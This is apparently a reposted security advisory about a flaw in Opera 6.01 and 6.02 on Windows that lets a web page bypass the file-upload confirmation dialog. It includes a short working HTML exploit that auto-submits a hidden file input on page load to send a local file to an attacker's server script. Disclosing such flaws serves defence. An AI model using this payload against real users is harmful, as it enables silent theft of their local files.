|
COMMAND Opera permit unwanted local file upload SYSTEMS AFFECTED Opera 6.01 on Windows platforms. Opera 6.02 on Windows platforms. PROBLEM In GreyMagic Security Advisory GM#001-OP [http://sec.greymagic.com/adv/gm001-op/] Opera, like all browsers today, supports the <input type=\"file\"> element, which is a standard method for users to upload files to HTTP servers. Since the file element is a very security-sensitive element, most web browsers do not allow its \"value\" attribute to be set (read only). If it was possible to assign an arbitrary string to the \"value\" attribute, an attacking server could fetch any local file by simply submitting a form (through scripting or social engineering, if scripting has been disabled). Opera\'s approach to the file element is a little different. The \"value\" attribute can be set, but before the form it resides in is submitted, a dialog comes up with the following warning: \"The files listed below have been selected, without your intervention, to be sent to another computer. Do you want to send these files?\" Discussion ========== It is possible to bypass the file element\'s confirmation dialog, which means an attacker can download any file from an unsuspecting Opera user. By appending a simple \" \" (HTML entity, which represents the ASCII code for a new-line character) to the end of the file element\'s \"value\" attribute, Opera\'s security algorithm is fooled to think that no files were assigned. Therefore, the warning dialog doesn\'t come up; Opera simply submits the form with the desired file chosen by an attacker. Surprisingly, versions of Opera prior to 6.01 are not vulnerable to this attack. So a change that occurred between version 6.0 and 6.01 is the culprit. This also means that all of the non-windows versions are safe (Opera did not release 6.01 for other platforms yet). Exploit ======= This exploit will automatically transfer the file \"c:/test.txt\" to an attacking host, which can handle it using a server-side environment such as ASP, PHP or other solutions. It does not require any user interaction: <body onload=\"document.secForm.submit()\"> <form method=\"post\" enctype=\"multipart/form-data\" action=\"recFile.php\" name=\"secForm\"> <input type=\"file\" name=\"expFile\" value=\"c:\\test.txt \" style=\"visibility:hidden\"> </form> </body> SOLUTION Upgrade to version 6.03